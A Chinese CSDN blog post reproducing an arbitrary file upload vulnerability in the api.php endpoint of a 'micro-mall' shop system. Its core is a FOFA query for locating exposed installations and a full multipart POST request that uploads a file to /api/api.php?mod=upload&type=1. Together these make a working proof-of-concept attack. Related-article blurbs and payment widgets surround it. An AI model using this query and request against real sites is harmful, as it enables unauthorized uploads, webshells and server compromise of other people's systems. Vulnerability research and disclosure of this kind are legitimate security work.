微商城系统api.php接口存在任意文件上传漏洞

最新推荐文章于 2024-11-01 16:03:12 发布
最新推荐文章于 2024-11-01 16:03:12 发布
阅读量465 收藏 5
点赞数 15
分类专栏: 漏洞复现 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790890/article/details/141462885
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 微商城系统简介

2.漏洞描述

微商城系统api.php接口存在任意文件上传漏洞

3.fofa查询语句1

body="/Mao_Public/js/jquery-2.1.1.min.js"

4.漏洞复现

漏洞链接:http://xx.xx.xx.xx/api/api.php?mod=upload&type=1

POST /api/api.php?mod=upload&type=1 HTTP/1.1
Host: xx.xx.xx.xx
User-Agent:Mozilla/4.0(compatible; MSIE 8.0;Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept:*/*
Connection: close
Content-Length: 274
Content-Type: multipart/form-data; boundary=ec3af73200618d8ba86bb2e42d4ec594

--ec3af73200618d8ba86bb2e42d4ec594
Content-Disposition: form-data; name="file"; filename="271857.txt"
Content-Type: image/png

792416340464
--ec3af73200618d8ba86bb2e42d4ec594
Content-Disposition: form-data; name="param"

param
--ec3af73200618d8ba86bb2e42d4ec594--

 

天官赐福万无禁忌
关注
专栏目录
百易云资产管理运营系统 comfileup.php 文件上传致RCE漏洞复现(XVE-2024-18154)
0xSec
07-25 1403
百易云资产管理运营系统 comfileup.php 接口存在文件上传漏洞,未经身份验证的攻击者通过漏洞上传恶意后门文件,执行任意代码,从而获取到服务器权限。
2024全新开发API接口调用管理系统网站源码 附教程.zip
01-15
标题中的“2024全新开发API接口调用管理系统网站源码 附教程.zip”表明这是一个包含源代码的压缩文件,特别的是,它是一个用于管理API接口调用的系统,并且附带了教程,便于用户理解和使用。API(Application ...
百易云资产管理运营系统 comfileup.php 文件上传致RCE
棉花糖的博客
07-26 534
百易云是一家专注于物业不动产领域数字化系统研发及应用的国家高新技术企业。主营业务有“智慧物管”、“智慧资管”,拥有自主研发技术及产品的数字物业厂商,总部研发位于长沙,目前业务已经成功拓展至深圳、上海、广州等一线城市,为客户提供在线化、数字化、智能化“三化合一”的专业化服务。
百易云资产管理运营系统 house.save.php SQL注入漏洞
网安小白
09-10 724
百易云资产管理运营系统,是专门针对企业不动产资产管理和运营需求而设计的一套综合解决方案。该系统能够覆盖资产的全生命周期管理,包括资产的登记、盘点、评估、处置等多个环节,同时提供强大的运营分析功能,帮助企业优化资产配置,提升运营效率。百易云资产管理运营系统 house.save.php 接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
H5 云商城 file.php 文件上传致RCE漏洞复现
0xSec
05-10 612
由于H5 云商城 /admin/commodtiy/ 接口商品图片上传处,没有对用户传入的文件进行校验和过滤判断,导致未经身份验证的远程攻击者可直接上传恶意后门文件,执行恶意代码,获取服务器权限。
基于PHP技术的台球室管理系统API接口设计源码
09-28
该项目是一款基于PHP技术的台球室管理系统API接口设计源码,包含192个文件,包括157个PHP源文件、5个Git忽略文件、4个Markdown文件、4个模板文件、3个文本文件、3个
2023全新API接口管理系统PHP程序源码 多用户端 多模板.zip
02-01
2023全新API接口管理系统PHP程序源码 基于PHP原生,EasyWeb框架 附带两套模板 (可自行根据已有模板开发模板) 附带三套本地接口 (二维码生成,随机一言,每日早报) 安装教程 PHP版本支持5.6-7.4 MySQL5.5-5.7 上传...
毕业设计:基于PHPapi接口自动生成系统.zip
11-06
【标题】:“基于PHPAPI接口自动生成系统” 在当今的Web开发中,API(Application Programming Interface)扮演着至关重要的角色,它使得不同系统和服务之间能够有效地交换数据。本项目是一个针对毕业生设计的PHP...
解析预测完美解析API接口PHP源码.zip
12-30
【标题】"解析预测完美解析API接口PHP源码" 提供了一套用于解析API接口...此外,根据`config.php`配置好所需的API密钥和服务器设置,以及正确理解和使用`jiekou.json`中定义的API接口信息,是成功运行这套源码的关键。
基于 SM3 的密钥派生函数 (KDF):国密合规的安全密钥生成方案
A_Lonely_Smile的博客
10-29 841
在现代加密技术中,密钥派生函数(Key Derivation Function, KDF)是一个将初始输入(如密码、共享密钥等)转换为安全密钥的过程,用于实现加密、消息认证等密码操作。特别是在符合国密标准的场景中,基于 SM3 的 KDF 已成为一种常用的密钥生成方式。本文将详细讲解 SM3-KDF 的工作原理,逐步介绍其实现过程,并提供 Java 代码示例,帮助您理解如何在项目中应用 SM3-KDF。
服务攻防之开发组件安全
qq_63831588的博客
10-28 1283
log4j 是 Apache 的一个开源日志库,是一个基于 Java 的日志记录框架,Log4j2 是 log4j 的后继者,其中引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI 组建等,被应用于业务系统开发,用于记录程序输入输出日志信息,log4j2 中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞,成功利用该漏洞可在目标服务器上执行任意代码。
冷钱包与热钱包的差异 | 加密货币存储的安全方案
最新发布
tusik68的博客
11-01 980
想要安全存储加密货币?了解冷钱包和热钱包的核心差异,找到适合的存储方式,确保您的数字资产安全无忧。
软件系统安全保证措施,质量保证措施方案(Word原件套用)
2302_79423711的博客
10-29 445
系统安全保证措施是构建稳固防御体系的核心,旨在全方位保障信息系统安全性。以下是对这七项措施的简要概述: 一、身份鉴别:采用多种认证方式,如密码、生物识别等,确保用户身份的准确无误,防止非法入侵。 二、访问控制:依据用户角色和权限,实施严格的访问策略,限制对敏感数据和功能的访问,保障系统安全。 三、通信完整性、保密性:通过加密技术和安全协议,确保数据传输过程中的完整性和保密性,防止信息泄露或被篡改。
【Python爬虫实战】网络爬虫完整指南:HTTP/HTTPS协议与爬虫安全实践
小火龙的博客
10-29 976
是互联网的核心协议之一,用于在客户端(如浏览器或爬虫)和服务器之间传输数据。HTTP协议定义了请求和响应的格式,帮助不同设备进行信息交换,例如我们在浏览网页时,浏览器就是通过HTTP向服务器请求页面内容,然后显示在用户面前。是HTTP协议的升级版,通过SSL/TLS加密协议增强了数据传输的安全性。HTTPS协议会在数据传输过程中对数据进行加密,防止中途被拦截或篡改,因此在保护用户隐私和敏感信息方面起到了重要作用。
Linux系统安全配置
qq_24442273的博客
10-28 798
【代码】Linux系统安全配置。
漫途焊机安全生产监管方案,提升安全生产管理水平!
mantoo2014的博客
11-01 282
随着智能制造时代的到来,企业安全生产管理的重要性日益凸显。因此,利用物联网技术和设备监控技术加强焊机安全生产监管,成为企业提升安全生产管理效率、降低安全事故率的重要手段。漫途焊机安全生产监管方案,凭借其物联网技术和设备监控技术。
uaGate SI——实现OT与IT的安全连接
SoftingChina的博客
10-28 869
对于许多制造商来说,诸如工业物联网(IIoT)、信息物理系统(CPS)和大数据等概念已经开始与其智能工厂的愿景紧密相连。智能工厂是将信息技术(IT)的数字世界与运营技术(OT)的物理世界连接起来,也就是实现IT与OT的融合。
如何实现PHP安全最大化
sheji888的专栏
10-29 469
要实现PHP安全最大化,并避免SQL注入漏洞和XSS跨站脚本攻击漏洞,你需要采取一系列的安全措施。
商城后端API接口开发与服务器搭建指南
资源摘要信息:"商城后端接口项目是一个集成了服务器搭建、软件配置以及API接口设计与文档说明的综合性开发资源。该项目特别强调了API接口的构建和文档化,为开发者提供了一套完整的后端服务解决方案。该项目使用的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值